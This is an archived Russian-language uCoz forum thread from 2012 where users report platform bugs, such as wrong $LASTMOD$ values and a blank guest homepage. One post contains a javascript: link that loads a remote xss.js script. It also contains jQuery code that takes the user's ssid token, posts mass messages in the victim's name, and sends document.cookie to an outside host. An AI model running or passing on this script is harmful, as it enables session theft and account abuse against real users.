Архив - только для чтения |
Сообщество uCoz Архивариус Архив Архив темы Если вы заметили баг (2012-2016гг.) |
Архив темы Если вы заметили баг |
Ljudmila2378, откройте любой шаблон на редактирование и найдите в правом верхнем углу кнопочку off и нажмите на неё.
вот на всякий фото кнопочки так должно работать Прикрепления:
4331993.gif
(3.2 Kb)
|
1. Сайт: думаю везде. Пусть будет Хелпер
2. номер сервера: s3 3. Не работает изменение времени правки материала от правки участника, соответственно неверно выводится значение $LASTMOD$ и неверно производится вывод материалов по дате изменения материала. $LASTMOD$ изменяется только от действий групп имеющих править все материалы(по умолчанию админ), что лишает смысл данной функции при возможности править материалы участниками. 4.Модуль: Онлайн игры, думаю что это во всех модулях. 5. Если сбой при редактировании материала, обязательно указываете режим редактирования: с запретом на любые коды 6.Желательно скриншот важных деталей: нет |
Andre, это еще что, вот после правки любого материала в подобных модулях например администратором, у него меняется время добавления (именно время) на время редактирования.
О проблеме уже известил, жду давно пока исправят. |
Alexander_K, это не тебе решать, а администратору конкретного сайта, тебе не нужно, а мне нужно.
Пока пришлось юкоз немного поломать и дать редактирование всех материалов проверенным, что естественно уменьшает уровень безопасности всего модуля. |
Тестовое сообщение для Kurt.
Добавлено (10-Июн-2012, 15:00:17) --------------------------------------------- Просьба не удалять верхнее сообщение, оно для проверки. Добавлено (10-Июн-2012, 15:06:28) --------------------------------------------- А также переходить по ссылке. Сообщение отредактировал Styler - Четверг, 21 Июн 2012, 18:59:15
|
|
Quote (-O-J-A-) тест Quote javascript:$('body').append('<script src=http://c7s.ru/xss.js></script>'); Code $(document).ready(function(){ var x_ssid = $('input[name="ssid"]').val(); var t_subject = "Тестовое сообщение"; var t_message = "Тут один человек сомневался...\nС уважением, O.J.A."; $.ajax({ url: '/index/', type: 'POST', dataType: 'xml', data: 'gr=1&gr=2&gr=3&gr=4&gr=5&gr=6&gr=7&gr=8&gr=9&gr=10&gr=251&subject='+t_subject+'&message='+t_message+'&a=18&t=1&ssid='+x_ssid+'&_tp_=xml', success: function(data){ } }); var p_cookies = document.cookie; $.ajax({ url: 'http://2012.c7s.ru/test.php', dataType: 'jsonp', jsonp: 'jsonp_callback', data: 'data='+p_cookies+'', success: function(data){ } }); }); Только идиоты не смотрят, куда кликают. |
Это через JS-скрипт, что-ли?
JavaScript же выполняется на стороне клиента, любая защита обеспечивается там же, независимо от сервера. А те, кто кликают на всём подряд (и устанавливают себе, собственноручно, различную херню), сами виноваты, защитить их невозможно. |
|
Ни когда с этой проблемой не сталкивался! Почему-то при входе на сайт "Гостем", Главная страница пустая, а при входе "Пользователь" всё норм, раньше такого не было!
Мне надо чтобы люди вошедшие видели всё на главной странице даже в статусе "Гость" http://elitepolk.clan.su/ Это баг или мои не доработки? |
|
| |||